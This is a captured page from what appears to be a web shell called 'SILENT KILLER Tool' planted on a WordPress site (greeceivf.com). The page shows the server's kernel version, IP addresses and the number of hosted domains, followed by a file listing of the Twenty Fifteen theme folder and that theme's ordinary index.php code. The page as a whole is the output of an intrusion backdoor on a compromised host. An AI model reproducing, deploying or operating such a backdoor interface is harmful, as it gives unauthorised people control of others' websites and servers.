Current Path: > home > ivftiowh > greeceivf.com > > wp-content > themes > twentyfifteen
Operation : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64 Software : Apache Server IP : 185.61.154.216 | Your IP: 216.73.216.44 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
css | Directory | - | - | |
genericons | Directory | - | - | |
inc | Directory | - | - | |
js | Directory | - | - | |
.htaccess | File | 160 bytes | May 14 2024 03:42:27. | |
404.php | File | 836 bytes | August 05 2024 07:23:44. | |
archive.php | File | 1914 bytes | December 11 2014 10:24:21. | |
author-bio.php | File | 1141 bytes | December 16 2014 13:00:22. | |
comments.php | File | 1836 bytes | October 05 2017 00:41:46. | |
content-link.php | File | 1753 bytes | December 16 2014 13:00:22. | |
content-none.php | File | 1166 bytes | December 16 2014 13:00:22. | |
content-page.php | File | 1117 bytes | December 16 2014 13:00:22. | |
content-search.php | File | 1101 bytes | December 16 2014 13:00:22. | |
content.php | File | 1702 bytes | December 16 2014 13:00:22. | |
error_log | File | 885 bytes | August 13 2025 12:24:37. | |
footer.php | File | 1013 bytes | May 17 2018 18:21:26. | |
functions.php | File | 14405 bytes | October 04 2017 23:53:47. | |
header.php | File | 1882 bytes | July 22 2024 20:05:35. | |
html5.css | File | 6407 bytes | May 15 2024 14:23:58. | |
image.php | File | 2940 bytes | December 16 2014 13:00:22. | |
index.php | File | 1765 bytes | December 11 2014 10:24:21. | |
page.php | File | 902 bytes | November 19 2014 20:28:25. | |
readme.txt | File | 3718 bytes | May 17 2018 18:27:27. | |
rtl.css | File | 12525 bytes | May 02 2018 22:15:25. | |
screenshot.png | File | 576231 bytes | March 18 2016 17:01:29. | |
search.php | File | 1405 bytes | December 16 2014 13:00:22. | |
sidebar.php | File | 1313 bytes | November 19 2014 20:28:25. | |
single.php | File | 1521 bytes | September 09 2017 14:48:44. | |
slider.css | File | 57 bytes | March 28 2024 18:37:27. | |
style.css | File | 98459 bytes | May 17 2018 18:27:27. |
<?php /** * The main template file * * This is the most generic template file in a WordPress theme * and one of the two required files for a theme (the other being style.css). * It is used to display a page when nothing more specific matches a query. * e.g., it puts together the home page when no home.php file exists. * * Learn more: {@link https://codex.wordpress.org/Template_Hierarchy} * * @package WordPress * @subpackage Twenty_Fifteen * @since Twenty Fifteen 1.0 */ get_header(); ?> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <?php if ( have_posts() ) : ?> <?php if ( is_home() && ! is_front_page() ) : ?> <header> <h1 class="page-title screen-reader-text"><?php single_post_title(); ?></h1> </header> <?php endif; ?> <?php // Start the loop. while ( have_posts() ) : the_post(); /* * Include the Post-Format-specific template for the content. * If you want to override this in a child theme, then include a file * called content-___.php (where ___ is the Post Format name) and that will be used instead. */ get_template_part( 'content', get_post_format() ); // End the loop. endwhile; // Previous/next page navigation. the_posts_pagination( array( 'prev_text' => __( 'Previous page', 'twentyfifteen' ), 'next_text' => __( 'Next page', 'twentyfifteen' ), 'before_page_number' => '<span class="meta-nav screen-reader-text">' . __( 'Page', 'twentyfifteen' ) . ' </span>', ) ); // If no content, include the "No posts found" template. else : get_template_part( 'content', 'none' ); endif; ?> </main><!-- .site-main --> </div><!-- .content-area --> <?php get_footer(); ?>
SILENT KILLER Tool